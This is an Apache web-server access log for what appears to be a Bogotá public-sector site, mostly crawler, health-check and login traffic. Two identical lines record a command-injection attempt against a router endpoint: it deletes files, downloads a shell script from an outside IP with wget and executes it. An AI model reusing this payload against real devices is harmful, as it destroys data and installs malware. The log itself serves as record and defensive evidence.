201.245.192.253 - - [19/Feb/2024:04:39:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38169
201.245.192.253 - - [19/Feb/2024:04:39:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39139
201.245.192.253 - - [19/Feb/2024:04:39:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39139
172.22.2.4 - - [19/Feb/2024:04:39:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Feb/2024:04:41:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:04:40:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.244.66.195 - - [19/Feb/2024:04:42:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/1211.pdf HTTP/1.1" 200 394342
216.244.66.195 - - [19/Feb/2024:04:43:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/1413.pdf HTTP/1.1" 200 382860
216.244.66.195 - - [19/Feb/2024:04:43:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/2151.pdf HTTP/1.1" 200 1235837
216.244.66.195 - - [19/Feb/2024:04:44:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4638.pdf HTTP/1.1" 200 674137
216.244.66.195 - - [19/Feb/2024:04:45:40 -0500] "GET /BLA/resoluciones/AUTOS%202023/2024.pdf HTTP/1.1" 200 408629
216.244.66.195 - - [19/Feb/2024:04:46:30 -0500] "GET /BLA/resoluciones/AUTOS%202023/2291.pdf HTTP/1.1" 200 606746
216.245.221.92 - - [19/Feb/2024:04:46:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:04:45:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:04:47:20 -0500] "GET /BLA/resoluciones/AUTOS%202023/2590.pdf HTTP/1.1" 200 1475954
172.22.2.4 - - [19/Feb/2024:04:45:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.244.66.195 - - [19/Feb/2024:04:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202023/2707.pdf HTTP/1.1" 200 993185
216.244.66.195 - - [19/Feb/2024:04:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202023/3500.pdf HTTP/1.1" 200 466872
216.244.66.195 - - [19/Feb/2024:04:49:51 -0500] "GET /BLA/resoluciones/AUTOS%202015/0555.pdf HTTP/1.1" 200 443709
114.119.138.107 - - [19/Feb/2024:04:49:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2003/&sort=date&order=asc HTTP/1.1" 200 14312
40.77.167.23 - - [19/Feb/2024:04:50:19 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3747.pdf HTTP/1.1" 200 344628
42.192.113.204 - - [19/Feb/2024:04:50:20 -0500] "GET /galeria/galeria/fotos/Entrenube4P.jpg HTTP/1.1" 200 10881
216.244.66.195 - - [19/Feb/2024:04:50:41 -0500] "GET /BLA/resoluciones/AUTOS%202015/0660.pdf HTTP/1.1" 200 500644
216.244.66.195 - - [19/Feb/2024:04:51:31 -0500] "GET /BLA/resoluciones/AUTOS%202015/1833.pdf HTTP/1.1" 200 508786
114.119.135.172 - - [19/Feb/2024:04:51:33 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2023/&sort=name&order=asc HTTP/1.1" 200 14374
216.245.221.92 - - [19/Feb/2024:04:51:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:04:51:39 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.244.66.195 - - [19/Feb/2024:04:52:21 -0500] "GET /BLA/resoluciones/AUTOS%202015/2063.pdf HTTP/1.1" 200 507084
3.93.51.51 - - [19/Feb/2024:04:52:21 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
172.22.2.4 - - [19/Feb/2024:04:50:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:04:51:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49785
172.22.2.4 - - [19/Feb/2024:04:51:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51124
187.108.72.163 - - [19/Feb/2024:04:53:34 -0500] "GET / HTTP/1.1" 200 319
40.77.167.254 - - [19/Feb/2024:04:55:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0816.pdf HTTP/1.1" 304 -
216.245.221.92 - - [19/Feb/2024:04:56:34 -0500] "HEAD / HTTP/1.1" 200 -
34.118.187.135 - - [19/Feb/2024:04:56:47 -0500] "\x16\x03\x01" 400 226
34.118.187.135 - - [19/Feb/2024:04:56:50 -0500] "OPTIONS / HTTP/1.0" 200 -
172.22.2.4 - - [19/Feb/2024:04:56:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.180 - - [19/Feb/2024:04:59:16 -0500] "GET /el-tratamiento-de-las-aguas-lluvias-grises-y-regeneradas-como-solucion-para-afrontar-los-efectos-del-cambio-climatico.html HTTP/1.1" 200 1014
172.22.2.4 - - [19/Feb/2024:04:57:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.245.221.92 - - [19/Feb/2024:05:01:34 -0500] "HEAD / HTTP/1.1" 200 -
185.224.128.10 - - [19/Feb/2024:05:03:01 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F204.76.203.111%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
185.224.128.10 - - [19/Feb/2024:05:03:01 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F204.76.203.111%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [19/Feb/2024:05:02:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:05:03:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
162.55.167.166 - - [19/Feb/2024:05:05:55 -0500] "GET / HTTP/1.1" 200 4720
17.241.227.86 - - [19/Feb/2024:05:05:56 -0500] "GET /distrito-invita-a-la-ciudadania-a-vivir-las-festividades-de-manera-responsable-con-los-animales.html HTTP/1.1" 200 782
216.245.221.92 - - [19/Feb/2024:05:06:34 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.70 - - [19/Feb/2024:05:06:45 -0500] "GET /appsia/ HTTP/1.1" 302 -
40.77.167.70 - - [19/Feb/2024:05:06:46 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [19/Feb/2024:05:08:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
103.56.17.252 - - [19/Feb/2024:05:10:41 -0500] "GET / HTTP/1.1" 200 319
103.56.17.252 - - [19/Feb/2024:05:10:41 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [19/Feb/2024:05:09:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [19/Feb/2024:05:11:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:05:12:16 -0500] "GET /BLA/boletinlegal/sitemap.txt HTTP/1.1" 404 1037
185.224.128.55 - - [19/Feb/2024:05:12:20 -0500] "GET / HTTP/1.1" 200 319
52.167.144.161 - - [19/Feb/2024:05:14:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0969.pdf HTTP/1.1" 200 451678
172.22.2.4 - - [19/Feb/2024:05:14:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Feb/2024:05:16:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:05:15:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54904
216.244.66.195 - - [19/Feb/2024:05:17:05 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [19/Feb/2024:05:19:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39110
201.245.192.253 - - [19/Feb/2024:05:19:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38163
201.245.192.253 - - [19/Feb/2024:05:19:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39130
201.245.192.253 - - [19/Feb/2024:05:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39130
216.245.221.92 - - [19/Feb/2024:05:21:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:05:20:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.161 - - [19/Feb/2024:05:22:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2131.pdf HTTP/1.1" 304 -
172.22.2.4 - - [19/Feb/2024:05:20:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58711
66.249.66.19 - - [19/Feb/2024:05:23:47 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%205%20del%2026%20de%20Diciembre%20de%202014.pdf HTTP/1.1" 304 -
69.171.251.8 - - [19/Feb/2024:05:25:31 -0500] "GET /images/27%20de%20enero%20Soratama.jpg HTTP/1.1" 200 63397
216.245.221.92 - - [19/Feb/2024:05:26:34 -0500] "HEAD / HTTP/1.1" 200 -
186.102.90.5 - - [19/Feb/2024:05:27:25 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+Z8Y7w1YpApajaCjP9KLoa35M9GnMu0yqhd+EF5L1hkdO9GDTn+Bha&y=U2FsdGVkX1/os7sLWRPHOy4HzRG3ZtxsFkd+I8ppe8Mge/b73VsoWzBYiE0Zn7rl HTTP/1.1" 200 30
186.102.90.5 - - [19/Feb/2024:05:27:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/PKNF8+aWraWv9/8VMNwBevEYmBE1M/As6Ccj4Dzextgt8oQL25cLLSfN+G2J32I3GkOeaJ0p2fm4cIMJOGDBJVFkKBH+iEB4=&u=U2FsdGVkX1/xex6dCevHy+zMZ83zmqFnqkZQbmYmMqc=&y=U2FsdGVkX1/os7sLWRPHOy4HzRG3ZtxsFkd+I8ppe8Mge/b73VsoWzBYiE0Zn7rl HTTP/1.1" 200 97
186.102.90.5 - - [19/Feb/2024:05:27:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+fsoTJSyTlXHTgdLTp6M//m1vK/0D8JEidZdcJOoFzSHaUgOawXvex1lEyxWaH67MxX1HP9O6avH8Edl7FKFD2DMnskzO/1e7VqdvN5ARCYCHIvZ319m9HY6g5vPbxx2FwKEuTZDKjcGm5NOeQBzKqPbSU/UrVPmHVLBIuz5M3451kw0vaENdof1dDPCcyOXBTzqZS5tzoScG6A/dtIDS8m8ty//hQzDth3Rv7G9zZ0Q51ULNptYligmuSTjX+bMzQccbtqm/vf7BYn3XxzgyPYDToFVZX0jJfZzm8r/t//s6PVvWZ3GRTQNgaCjmn29aXLwhxk1RshgMIiSiqXX2OxM/k0RSERrEDNZjf1NRP2p7/wEG4xKla3mLE/F8YmSyatiD0fpJmEh4hN+b60Aej0TDEGUcHEbvO6sxEjlKFGIWh5rkKrSPPaFiyALHiS+T6ylIbz9o3S/o+FQgWL4xQERJ9Ey2BTIKEVDIPdb09e+SBrr6w0xGMRskQlJH4ZS6jotI1wzcafMtS+1OWe+n6JL+5weWIh/c+LI+tyY5n27Y+jpDrvUiBR8mI7kqehqOwH5pRsb9ApUVd7FkJwKYOtZ0lGQX0hHFuwFnniAF/pGyy+0F/ggDsPccu6anosfOx2/+bpxObjHvcYOQ9zIFaqp1mSAU6tINCkWDrLw0xShqMCG1/3DQiefjaUQGMknhrbKW4KSmunamopUolnObzn6z9CaH0OHzR4nkzzJq9UTGc9vuWcEiMsfDQF9m+UMZZHCE9/B5qfU7OooO7M28ArZueV6Ool4qTFeaGNScSZpYR/pI4UQ49EnnMFq4DvAqcBtdqo+q4RaLbSy22KqR7X2QXoYpFRD+THdGCgi0ZPYXfRnb0jgGZsCjsArYE6D+0ERTmUjLt93RM3lF1+iOf+E4FxDKc+mGphzI/jJUnxYg0MhmeCuGeECiLRemcAA5e9s7bhdCdnzZmLB/jx8ZfmggCdMYxNV8enAHtfqlRT3MM2/Rfba86LzuDc+jRFmjvFdCBESNwulgfbYUsrhcgbpDoDhQyWFI9Ct2YCyv2zumlxLDTENhVtLC/YVv0yPz2njfQv2SpUID2dbxJLFWY5fNa1MYrRjhgz3VdxBMvhKJSZ7NAz20g3GXYZTpOB7fp6ZvUX8MVkIrjQ0obsplr0E5MQWnTGePuot1xnsIJGOvjSEyewAo4bcka4MXoYRa9YaVlkrgfbVFjHd78spO8SuD+2YhsfrfPhnW3sgszQdLfklMZbOkUyiBISo7jRRiI67Las8oX2FbdT1F/HXbWyX1DMBnO2xCC0YSaUZFYJ4GMlJ6UpccTjX5NOO8btgWbvMoj1fVzcxfSj5fVmIpqem43MUa8geukCzalGz47saoHLilQNtuMfrquY5ycOe05jWGqmcpIgrOvG/qIPosTe0R1ghGSqz4=&u=U2FsdGVkX1/xex6dCevHy+zMZ83zmqFnqkZQbmYmMqc=&y=U2FsdGVkX1/os7sLWRPHOy4HzRG3ZtxsFkd+I8ppe8Mge/b73VsoWzBYiE0Zn7rl HTTP/1.1" 200 2421
186.102.90.5 - - [19/Feb/2024:05:27:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/Ge7Zfcl9silrUMj3uEr3IuJIpMC7DpJF3Piex+tNaO6lfz+4rjInt++/c+Q7zCx1W9vpUDDVuizMTzTD02qwqN11Ml/ZjoNI30eALLMtxha/UZlj1lXL/pcp28eMgJ9uqcrIt8kXqsJNbc2lDj8/mm2fV5KIBRCQZ9J1qKqcD2G/DqaB7BjydCwMo6BifYYCk/Muh9XeIBbXTh5D6OajvpUIxkEwUu+KmhYxt7LGM1oFsDCDZdVvI45uZDFFermT3Sa/kdmsFjViEQlPFKcs8ko+l+zZm5USxp8PatbcGw6IRyVDSjqLb+1UVYIEXKQhfcONH5UGKJUrT65s9wb8lpfE3veagbxI=&u=U2FsdGVkX1/xex6dCevHy+zMZ83zmqFnqkZQbmYmMqc=&y=U2FsdGVkX1/os7sLWRPHOy4HzRG3ZtxsFkd+I8ppe8Mge/b73VsoWzBYiE0Zn7rl HTTP/1.1" 200 196
186.102.90.5 - - [19/Feb/2024:05:27:26 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+Z8Y7w1YpApajaCjP9KLoa35M9GnMu0yqhd+EF5L1hkdO9GDTn+Bha HTTP/1.1" 200 32032
172.22.2.4 - - [19/Feb/2024:05:25:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:05:26:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57476
201.245.192.253 - - [19/Feb/2024:05:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39110
201.245.192.253 - - [19/Feb/2024:05:29:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38163
201.245.192.253 - - [19/Feb/2024:05:29:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39130
216.244.66.195 - - [19/Feb/2024:05:29:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0272.pdf HTTP/1.1" 200 400733
201.245.192.253 - - [19/Feb/2024:05:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39130
216.244.66.195 - - [19/Feb/2024:05:30:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0454.pdf HTTP/1.1" 200 390242
216.244.66.195 - - [19/Feb/2024:05:31:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0624.pdf HTTP/1.1" 200 317811
216.245.221.92 - - [19/Feb/2024:05:31:34 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:05:32:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/1404.pdf HTTP/1.1" 200 380147
216.244.66.195 - - [19/Feb/2024:05:32:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/1429.pdf HTTP/1.1" 200 346997
114.119.132.170 - - [19/Feb/2024:05:33:03 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2015/&sort=size&order=asc HTTP/1.1" 200 14353
172.22.2.4 - - [19/Feb/2024:05:31:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:05:33:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/1602.pdf HTTP/1.1" 200 601116
172.22.2.4 - - [19/Feb/2024:05:32:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.244.66.195 - - [19/Feb/2024:05:34:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/2623.pdf HTTP/1.1" 200 581669
216.244.66.195 - - [19/Feb/2024:05:35:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/3512.pdf HTTP/1.1" 200 932172
216.244.66.195 - - [19/Feb/2024:05:36:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/2106.pdf HTTP/1.1" 200 402475
216.245.221.92 - - [19/Feb/2024:05:36:34 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:05:36:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/2302.pdf HTTP/1.1" 200 654613
216.244.66.195 - - [19/Feb/2024:05:37:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/2310.pdf HTTP/1.1" 200 416108
216.244.66.195 - - [19/Feb/2024:05:38:29 -0500] "GET /BLA/resoluciones/AUTOS%202023/3122.pdf HTTP/1.1" 200 1218543
201.245.192.253 - - [19/Feb/2024:05:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39110
172.22.2.4 - - [19/Feb/2024:05:37:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:05:39:19 -0500] "GET /BLA/resoluciones/AUTOS%202023/3174.pdf HTTP/1.1" 200 2881845
201.245.192.253 - - [19/Feb/2024:05:39:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38163
201.245.192.253 - - [19/Feb/2024:05:39:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39130
201.245.192.253 - - [19/Feb/2024:05:39:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39130
172.22.2.4 - - [19/Feb/2024:05:38:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58264
216.244.66.195 - - [19/Feb/2024:05:40:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/3332.pdf HTTP/1.1" 200 1301358
216.244.66.195 - - [19/Feb/2024:05:41:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/3510.pdf HTTP/1.1" 200 448798
216.245.221.92 - - [19/Feb/2024:05:41:34 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:05:41:53 -0500] "GET /BLA/resoluciones/AUTOS%202015/3618.pdf HTTP/1.1" 200 512163
216.244.66.195 - - [19/Feb/2024:05:42:36 -0500] "GET /BLA/resoluciones/AUTOS%202015/3895.pdf HTTP/1.1" 200 501798
216.244.66.195 - - [19/Feb/2024:05:43:27 -0500] "GET /BLA/resoluciones/AUTOS%202015/3983.pdf HTTP/1.1" 200 497716
161.10.179.183 - - [19/Feb/2024:05:43:31 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
161.10.179.183 - - [19/Feb/2024:05:43:31 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.10.179.183 - - [19/Feb/2024:05:43:38 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
161.10.179.183 - - [19/Feb/2024:05:43:38 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.10.179.183 - - [19/Feb/2024:05:43:40 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
161.10.179.183 - - [19/Feb/2024:05:43:40 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12403
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:06 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:09 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2220
161.10.179.183 - - [19/Feb/2024:05:44:09 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16475
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:10 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
161.10.179.183 - - [19/Feb/2024:05:44:12 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:12 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
161.10.179.183 - - [19/Feb/2024:05:44:13 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64274
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [19/Feb/2024:05:44:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0715.pdf HTTP/1.1" 200 338528
161.10.179.183 - - [19/Feb/2024:05:44:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
161.10.179.183 - - [19/Feb/2024:05:44:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 12650
161.10.179.183 - - [19/Feb/2024:05:44:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 133117
161.10.179.183 - - [19/Feb/2024:05:44:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:44:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.39 - - [19/Feb/2024:05:44:54 -0500] "GET /carolina-urrutia-tener-trazado-un-camino-en-el-que-cada-sector-sepa-lo-que-invierte-sacrifica-y-gana-es-lo-que-dejara-la-politica-de-accion-climatica-para-bogota.html HTTP/1.1" 200 856
216.244.66.195 - - [19/Feb/2024:05:45:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/0252.pdf HTTP/1.1" 200 446104
161.10.179.183 - - [19/Feb/2024:05:45:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 21241
161.10.179.183 - - [19/Feb/2024:05:45:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:45:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:45:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:45:08 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:45:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.10.179.183 - - [19/Feb/2024:05:45:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
